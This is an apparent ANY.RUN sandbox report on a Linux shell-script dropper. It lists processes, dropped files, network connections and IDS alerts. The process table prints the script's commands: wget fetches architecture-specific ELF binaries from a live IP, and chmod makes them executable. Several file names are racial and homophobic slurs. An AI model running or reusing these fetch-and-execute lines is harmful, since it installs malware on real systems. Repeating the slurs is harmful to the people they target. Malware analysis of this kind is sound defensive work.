File name:

nigga.sh

Full analysis: https://app.any.run/tasks/8b88b9e2-ba8b-4845-bdd6-51bbc63a7fb1
Verdict: Malicious activity
Analysis date: January 26, 2024, 15:42:46
OS: Ubuntu 22.04.2
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

B3A525C46BCF154098C2CDA13B5CD513

SHA1:

3D9E6BB9930EDA472A482AEF95761630DCA82BEC

SHA256:

7D45BF0A85D2B166E22EFDF7F1091FD7B5727740D327B99C965A2BE2F43D16DF

SSDEEP:

24:U1xi9SXq7W7mRm0ZUFIXNIeGF2hiFpqRXyvZULKq/XKE5DL:Ua9SXq7WqRm0fX62ULqRXyviLKq/XKE1

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Modifies file or directory owner

      • sudo (PID: 6857)

    • Changes file or directory permissions

      • sh (PID: 6856)
      • bash (PID: 6861)

    • Executes commands using command-line interpreter

      • sudo (PID: 6860)

    • Checks system locale (may determine the language used by the system)

      • bash (PID: 6861)

    • Reads passwd file

      • bash (PID: 6861)
      • chown (PID: 6858)

    • Uses wget to download content

      • bash (PID: 6861)

  • INFO

    • Checks timezone

      • sudo (PID: 6857)
      • sudo (PID: 6860)
      • wget (PID: 6863)
      • wget (PID: 6867)
      • wget (PID: 6878)
      • wget (PID: 6871)
      • wget (PID: 6908)
      • wget (PID: 6883)
      • wget (PID: 6887)
      • wget (PID: 6899)
      • wget (PID: 6891)
      • wget (PID: 6895)
      • wget (PID: 6903)
      • wget (PID: 6912)
      • wget (PID: 6916)

    • Manipulating modules (likely to execute programs on system boot)

      • modprobe (PID: 6866)
      • modprobe (PID: 6870)

    • Creates file in the temporary folder

      • wget (PID: 6863)
      • wget (PID: 6867)
      • wget (PID: 6871)
      • wget (PID: 6878)
      • wget (PID: 6883)
      • wget (PID: 6887)
      • wget (PID: 6891)
      • wget (PID: 6895)
      • wget (PID: 6908)
      • wget (PID: 6899)
      • wget (PID: 6903)
      • wget (PID: 6912)
      • wget (PID: 6916)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
279
Monitored processes
63
Malicious processes
0
Suspicious processes
3

Behavior graph

Click at the process to see the details
start sh no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs wget no specs chmod no specs bash no specs modprobe no specs wget no specs chmod no specs bash no specs modprobe no specs wget no specs chmod no specs faggot no specs faggot no specs wget no specs faggot no specs faggot no specs faggot no specs faggot no specs faggot no specs chmod no specs bash no specs wget no specs faggot no specs chmod no specs bash no specs wget no specs faggot no specs chmod no specs bash no specs wget no specs faggot no specs chmod no specs bash no specs wget no specs faggot no specs chmod no specs bash no specs wget no specs faggot no specs chmod no specs bash no specs wget no specs faggot no specs chmod no specs bash no specs wget no specs faggot no specs chmod no specs bash no specs wget no specs faggot no specs chmod no specs bash no specs wget no specs faggot no specs chmod no specs bash no specs

Process information

PID
CMD
Path
Indicators
Parent process
6856/bin/sh -c "sudo chown user \"/tmp/nigga\.sh\" && chmod +x \"/tmp/nigga\.sh\" && DISPLAY=:0 sudo -iu user \"/tmp/nigga\.sh\" " /bin/shany-guest-agent
User:
user
Integrity Level:
UNKNOWN
Exit code:
6885
6857sudo chown user /tmp/nigga.sh /usr/bin/sudosh
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
6858chown user /tmp/nigga.sh /usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
6859chmod +x /tmp/nigga.sh /usr/bin/chmodsh
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
6860sudo -iu user /tmp/nigga.sh /usr/bin/sudosh
User:
user
Integrity Level:
UNKNOWN
Exit code:
6885
6861-bash --login -c \/tmp\/nigga\.sh /bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
6879
6862/usr/bin/locale-check C.UTF-8 /usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
6863wget -O lol http://104.168.5.4/mips /usr/bin/wgetbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
510
6864chmod +x lol /usr/bin/chmodbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
6861
6865-bash --login -c \/tmp\/nigga\.sh /usr/bin/bashbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
6862
Executable files
0
Suspicious files
0
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
6863wget/tmp/lol
MD5:
SHA256:
6867wget/tmp/lmao
MD5:
SHA256:
6871wget/tmp/faggot
MD5:
SHA256:
6878wget/tmp/gay
MD5:
SHA256:
6883wget/tmp/retard
MD5:
SHA256:
6887wget/tmp/nigger
MD5:
SHA256:
6891wget/tmp/shit
MD5:
SHA256:
6895wget/tmp/nigga
MD5:
SHA256:
6899wget/tmp/kekw
MD5:
SHA256:
6903wget/tmp/what
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
34
DNS requests
6
Threats
13

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
104.168.5.4:80
http://104.168.5.4/arm
unknown
binary
32.9 Kb
unknown
GET
200
104.168.5.4:80
http://104.168.5.4/mips
unknown
binary
34.1 Kb
unknown
GET
200
104.168.5.4:80
http://104.168.5.4/x86_64
unknown
binary
33.6 Kb
unknown
GET
200
104.168.5.4:80
http://104.168.5.4/mpsl
unknown
binary
35.2 Kb
unknown
GET
200
104.168.5.4:80
http://104.168.5.4/arm5
unknown
binary
31.4 Kb
unknown
GET
200
104.168.5.4:80
http://104.168.5.4/arm7
unknown
binary
58.0 Kb
unknown
GET
200
104.168.5.4:80
http://104.168.5.4/arm6
unknown
binary
36.8 Kb
unknown
GET
200
104.168.5.4:80
http://104.168.5.4/i586
unknown
binary
30.7 Kb
unknown
GET
200
104.168.5.4:80
http://104.168.5.4/i686
unknown
binary
32.0 Kb
unknown
GET
200
104.168.5.4:80
http://104.168.5.4/sh4
unknown
binary
65.3 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
195.181.170.18:443
Datacamp Limited
DE
unknown
224.0.0.251:5353
unknown
104.168.5.4:80
AS-COLOCROSSING
US
malicious
185.224.128.191:21425
SpectraIP B.V.
NL
unknown
185.224.128.191:3632
SpectraIP B.V.
NL
unknown
156.146.33.137:443
Datacamp Limited
DE
unknown
185.125.188.54:443
api.snapcraft.io
Canonical Group Limited
GB
unknown
185.125.188.55:443
api.snapcraft.io
Canonical Group Limited
GB
malicious

DNS requests

Domain
IP
Reputation
61.100.168.192.in-addr.arpa
unknown
api.snapcraft.io
  • 185.125.188.54
  • 185.125.188.55
  • 185.125.188.58
  • 185.125.188.59
unknown
connectivity-check.ubuntu.com
  • 2620:2d:4000:1::22
  • 2001:67c:1562::23
  • 2001:67c:1562::24
  • 2620:2d:4000:1::2b
  • 2620:2d:4000:1::2a
  • 2620:2d:4000:1::23
unknown

Threats

PID
Process
Class
Message
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
nigga.sh